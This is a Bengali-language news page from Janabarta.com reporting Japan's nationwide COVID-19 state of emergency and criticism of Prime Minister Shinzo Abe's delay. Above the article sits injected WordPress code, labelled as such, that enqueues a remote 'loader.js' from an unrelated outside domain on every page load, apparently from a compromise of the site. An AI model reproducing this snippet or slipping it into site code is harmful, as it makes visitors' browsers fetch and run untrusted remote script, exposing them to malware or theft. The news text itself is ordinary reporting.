// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনাভাইরাস: এবার দেশজুড়ে জরুরি অবস্থা ঘোষণা জাপানের - Janabarta.com

করোনাভাইরাস: এবার দেশজুড়ে জরুরি অবস্থা ঘোষণা জাপানের

আন্তর্জাতিক ডেস্ক: করোনাভাইরাসের প্রাদুর্ভাব পরিস্থিতি ক্রমেই খারাপ হয়ে যাওয়ায় দেশজুড়ে জরুরি অবস্থার ঘোষণা দিয়েছে জাপান। এই ঘোষণার মাধ্যমে জাপানের প্রাদেশিক সরকার এখন তাদের বাসিন্দাদের বাড়িতে থাকার নির্দেশনা দেওয়ার আইনি ভিত্তি পেলো। কিন্তু কাউকে শাস্তি বা আইনি ভয় দেখিয়ে বাড়িতে থাকতে বলা যাবে না বলে নির্দেশনা দেওয়া হয়েছে।

বর্তমান এই জরুরি অবস্থা মাসের ছয় তারিখ পর্যন্ত কার্যকর থাকবে। এর আগে জাপানের প্রধানমন্ত্রী শিনজো আবে কয়েকটি অঞ্চলে এক মাসের জরুরি অবস্থা ঘোষণা করেছিলেন। বিশেষজ্ঞদের সাথে জরুরি বৈঠকের পর শিনজো আবে জাপানে জরুরি অবস্থা জারির ঘোষণা দেন।

জাপানের ৭০ শতাংশের বেশি মানুষ মনে করেন জরুরি অবস্থা ঘোষণা করতে অনেক দেরি করে ফেলেছেন শিনজো। ফলে জাপানজুড়ে তার সমালোচনা শুরু হয়েছে। সম্প্রতি টোকিওতে কোভিড-নাইটনিতে আক্রান্তের সংখ্যা অত্যন্ত দ্রুত গতিতে বৃদ্ধি পেয়েছে। এরপরই শিনজো আবের কড়া সমালোচনা শুরু হয়।

প্রাথমিক জরুরি অবস্থার পর বেশ কয়েকটি প্রদেশ থেকে জরুরি অবস্থা বাড়ানোর দাবি তোলা হয়। কেন্দ্রীয় সরকারকে জানানো হয় যে, আক্রান্তের সংখ্যা দিন দিন বাড়ছে এবং ক্রমেই হাসপাতালগুলোর ব্যবস্থাপনা ভেঙে পড়ছে।

জরুরি স্বাস্থ্য ব্যবস্থাপনা সংক্রান্ত দুটি প্রতিষ্ঠান এর মধ্যেই সরকারকে সতর্ক করে দিয়ে বলেছে যে, জাপানের পরিস্থিতি ভয়ঙ্কর হতে পারে। তারা আরো বলেছে, হাসপাতালগুলো প্রচুর রোগীর চাপ সামাল দিতে পারবে না। স্বাস্থ্য ব্যবস্থা ভেঙে পড়তে পারে বলে আশঙ্কা প্রকাশ করেছে তারা।

জাপানে প্রথম করোনাভাইরাসে আক্রান্ত রোগী চিহ্নিত হয় তিন মাস আগে। এরপরও দেশটি বেশি বেশি টেস্ট করার জন্য বিশ্ব স্বাস্থ্য সংস্থা যে নির্দেশনা দিয়েছে, তা মানেনি। বেশি বেশি টেস্ট করার নির্দেশনাকে জাপান সরকার ‘সম্পদের অপচয়’ বলে মন্তব্য করেছিলো।